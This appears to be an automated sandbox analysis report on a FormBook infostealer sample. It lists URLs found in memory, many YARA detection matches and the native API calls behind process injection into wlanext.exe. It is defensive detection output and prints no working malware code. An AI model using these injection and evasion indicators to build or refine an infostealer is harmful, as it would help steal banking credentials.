20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a
          Source: wlanext.exe, 00000007.00000002.908237231.0000000003E92000.00000004.00000001.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 1cec9342_by_Libranalysis.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 1cec9342_by_Libranalysis.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000000.656903720.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: wlanext.exe, 00000007.00000002.908237231.0000000003E92000.00000004.00000001.sdmpString found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=it&domain=booweats.com&origin=sales_lande
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040535C

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004181C0 NtCreateFile,1_2_004181C0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00418270 NtReadFile,1_2_00418270
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004182F0 NtClose,1_2_004182F0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004183A0 NtAllocateVirtualMemory,1_2_004183A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004181BA NtCreateFile,1_2_004181BA
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041826C NtReadFile,1_2_0041826C
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004182EA NtClose,1_2_004182EA
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A598F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00A598F0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00A59860
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59840 NtDelayExecution,LdrInitializeThunk,1_2_00A59840
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A599A0 NtCreateSection,LdrInitializeThunk,1_2_00A599A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00A59910
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59A20 NtResumeThread,LdrInitializeThunk,1_2_00A59A20
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00A59A00
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59A50 NtCreateFile,LdrInitializeThunk,1_2_00A59A50
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A595D0 NtClose,LdrInitializeThunk,1_2_00A595D0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59540 NtReadFile,LdrInitializeThunk,1_2_00A59540
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A596E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00A596E0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00A59660
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A597A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00A597A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59780 NtMapViewOfSection,LdrInitializeThunk,1_2_00A59780
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59FE0 NtCreateMutant,LdrInitializeThunk,1_2_00A59FE0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59710 NtQueryInformationToken,LdrInitializeThunk,1_2_00A59710
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A598A0 NtWriteVirtualMemory,1_2_00A598A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59820 NtEnumerateKey,1_2_00A59820
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A5B040 NtSuspendThread,1_2_00A5B040
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A599D0 NtCreateProcessEx,1_2_00A599D0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59950 NtQueueApcThread,1_2_00A59950
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59A80 NtOpenDirectoryObject,1_2_00A59A80
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59A10 NtQuerySection,1_2_00A59A10
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A5A3B0 NtGetContextThread,1_2_00A5A3B0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59B00 NtSetValueKey,1_2_00A59B00
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A595F0 NtQueryInformationFile,1_2_00A595F0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59520 NtWaitForSingleObject,1_2_00A59520
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A5AD30 NtSetContextThread,1_2_00A5AD30
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59560 NtWriteFile,1_2_00A59560
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A596D0 NtCreateKey,1_2_00A596D0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59610 NtEnumerateValueKey,1_2_00A59610
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59670 NtQueryInformationProcess,1_2_00A59670
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59650 NtQueryValueKey,1_2_00A59650
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59730 NtQueryVirtualMemory,1_2_00A59730
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A5A710 NtOpenProcessToken,1_2_00A5A710
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59760 NtOpenProcess,1_2_00A59760
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59770 NtSetInformationFile,1_2_00A59770
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A5A770 NtOpenThread,1_2_00A5A770
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_004181C0 NtCreateFile,1_1_004181C0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_00418270 NtReadFile,1_1_00418270
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_004182F0 NtClose,1_1_004182F0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_004183A0 NtAllocateVirtualMemory,1_1_004183A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_004181BA NtCreateFile,1_1_004181BA
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_0041826C NtReadFile,1_1_0041826C
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_004182EA NtClose,1_1_004182EA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849A50 NtCreateFile,LdrInitializeThunk,7_2_03849A50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038499A0 NtCreateSection,LdrInitializeThunk,7_2_038499A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_03849910
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849840 NtDelayExecution,LdrInitializeThunk,7_2_03849840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849860 NtQuerySystemInformation,LdrInitializeThunk,7_2_03849860
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849780 NtMapViewOfSection,LdrInitializeThunk,7_2_03849780
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849FE0 NtCreateMutant,LdrInitializeThunk,7_2_03849FE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849710 NtQueryInformationToken,LdrInitializeThunk,7_2_03849710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038496D0 NtCreateKey,LdrInitializeThunk,7_2_038496D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038496E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_038496E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849650 NtQueryValueKey,LdrInitializeThunk,7_2_03849650
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_03849660
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038495D0 NtClose,LdrInitializeThunk,7_2_038495D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849540 NtReadFile,LdrInitializeThunk,7_2_03849540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0384A3B0 NtGetContextThread,7_2_0384A3B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849B00 NtSetValueKey,7_2_03849B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849A80 NtOpenDirectoryObject,7_2_03849A80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849A00 NtProtectVirtualMemory,7_2_03849A00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849A10 NtQuerySection,7_2_03849A10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849A20 NtResumeThread,7_2_03849A20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038499D0 NtCreateProcessEx,7_2_038499D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849950 NtQueueApcThread,7_2_03849950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038498A0 NtWriteVirtualMemory,7_2_038498A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038498F0 NtReadVirtualMemory,7_2_038498F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849820 NtEnumerateKey,7_2_03849820
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0384B040 NtSuspendThread,7_2_0384B040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038497A0 NtUnmapViewOfSection,7_2_038497A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0384A710 NtOpenProcessToken,7_2_0384A710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849730 NtQueryVirtualMemory,7_2_03849730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849760 NtOpenProcess,7_2_03849760
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0384A770 NtOpenThread,7_2_0384A770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849770 NtSetInformationFile,7_2_03849770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849610 NtEnumerateValueKey,7_2_03849610
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849670 NtQueryInformationProcess,7_2_03849670
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038495F0 NtQueryInformationFile,7_2_038495F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849520 NtWaitForSingleObject,7_2_03849520
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0384AD30 NtSetContextThread,7_2_0384AD30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849560 NtWriteFile,7_2_03849560
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_010481C0 NtCreateFile,7_2_010481C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_010483A0 NtAllocateVirtualMemory,7_2_010483A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01048270 NtReadFile,7_2_01048270
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_010482F0 NtClose,7_2_010482F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_010481BA NtCreateFile,7_2_010481BA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104826C NtReadFile,7_2_0104826C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_010482EA NtClose,7_2_010482EA
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_004069450_2_00406945
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_0040711C0_2_0040711C
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00408C5B1_2_00408C5B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00408C601_2_00408C60
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041C5381_2_0041C538
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00402D891_2_00402D89
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041C7A01_2_0041C7A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A420A01_2_00A420A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE20A81_2_00AE20A8
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2B0901_2_00A2B090
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE28EC1_2_00AE28EC
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD10021_2_00AD1002
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A341201_2_00A34120
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1F9001_2_00A1F900
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE22AE1_2_00AE22AE
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4EBB01_2_00A4EBB0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADDBD21_2_00ADDBD2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE2B281_2_00AE2B28
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2841F1_2_00A2841F
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADD4661_2_00ADD466
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A425811_2_00A42581
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2D5E01_2_00A2D5E0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE25DD1_2_00AE25DD
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A10D201_2_00A10D20
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE2D071_2_00AE2D07
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE1D551_2_00AE1D55
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE2EF71_2_00AE2EF7
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A36E301_2_00A36E30
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE1FF11_2_00AE1FF1
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_004010301_1_00401030
